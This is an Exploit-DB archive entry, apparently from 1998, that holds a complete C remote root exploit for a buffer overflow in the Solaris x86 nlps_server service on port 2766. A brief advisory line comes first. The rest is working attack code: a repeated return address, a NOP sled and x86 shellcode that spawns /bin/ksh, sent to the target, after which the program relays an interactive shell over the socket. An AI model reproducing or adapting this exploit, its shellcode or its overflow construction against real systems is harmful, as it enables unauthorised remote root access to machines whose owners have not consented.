Solaris x86 2.4/2.5 - nlps_server Buffer Overflow

EDB-ID:

20602




Platform:

Solaris

Date:

1998-04-01


// source: https://www.securityfocus.com/bid/2319/info

Solaris 2.4, 2.5, and 2.51 x86 are vulnerable to a buffer overflow in nlps_server, a process residing on port 2766 when installed. Attackers can exploit this buffer overflow to gain remote root access. 

/*## copyright LAST STAGE OF DELIRIUM apr 1998 poland        *://lsd-pl.net/ #*/
/*## listen/nlps_server                                                      #*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>

#define ADRNUM 256
#define NOPNUM 64+46+7+4

char adr[4]="\x30\x79\x04\x08";

char shellcode[]=
    "\xeb\x1b"             /* jmp     <shellcode+30>       */
    "\x33\xd2"             /* xorl    %edx,%edx            */
    "\x58"                 /* popl    %eax                 */
    "\x8d\x78\x14"         /* leal    0x14(%eax),edi       */
    "\x52"                 /* pushl   %edx                 */
    "\x57"                 /* pushl   %edi                 */
    "\x50"                 /* pushl   %eax                 */
    "\xab"                 /* stosl   %eax,%es:(%edi)      */
    "\x92"                 /* xchgl   %eax,%edx            */
    "\xab"                 /* stosl   %eax,%es:(%edi)      */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)        */
    "\x83\xef\x3c"         /* subl    $0x3c,%edi           */
    "\xb0\x9a"             /* movb    $0x9a,%al            */
    "\xab"                 /* stosl   %eax,%es:(%edi)      */
    "\x47"                 /* incl    %edi                 */
    "\xb0\x07"             /* movb    $0x7,%al             */
    "\xab"                 /* stosl   %eax,%es:(%edi)      */
    "\xb0\x3b"             /* movb    $0x3b,%al            */
    "\xe8\xe0\xff\xff\xff" /* call    <shellcode+2>        */
    "/bin/ksh"
;

main(int argc,char **argv){
    char buffer[1024],*b; 
    int sck,i;
    struct sockaddr_in address;
    struct hostent *hp;

    printf("copyright LAST STAGE OF DELIRIUM apr 1998 poland  //lsd-pl.net/\n");
    printf("listen/nlps_server for solaris 2.4 2.5 2.5.1 x86\n\n");

    if(argc!=2){
        printf("usage: %s address\n",argv[0]);exit(1);
    }
    sck=socket(AF_INET,SOCK_STREAM,0);
    bzero(&address,sizeof(address));
    address.sin_family=AF_INET;
    address.sin_port=htons(2766);
    if((address.sin_addr.s_addr=inet_addr(argv[1]))==-1){
        if((hp=gethostbyname(argv[1]))==NULL){
            printf("error: address.\n");exit(-1);
        }
        memcpy(&address.sin_addr.s_addr,hp->h_addr,4);
    }
    if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0){
        perror("error");exit(-1);
    }
 
    sprintf(buffer,"NLPS:002:002:");
    b=&buffer[13];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<NOPNUM;i++) *b++=0x90;
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    for(i=0;i<(14+ADRNUM+NOPNUM+strlen(shellcode)+1);i++)
        printf("%02x",(unsigned char)buffer[i]);
    fflush(stdout);

    write(sck,buffer,14+ADRNUM+NOPNUM+strlen(shellcode)+34+1);
    write(sck,"yahoo...\n",9);

    while(1){
        fd_set fds;
        FD_ZERO(&fds);
        FD_SET(0,&fds);
        FD_SET(sck,&fds);
        if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
            int cnt;
            char buf[1024];
            if(FD_ISSET(0,&fds)){
                if((cnt=read(0,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(sck,buf,cnt);
            }
            if(FD_ISSET(sck,&fds)){
                if((cnt=read(sck,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(1,buf,cnt);
            }
        }
    }
}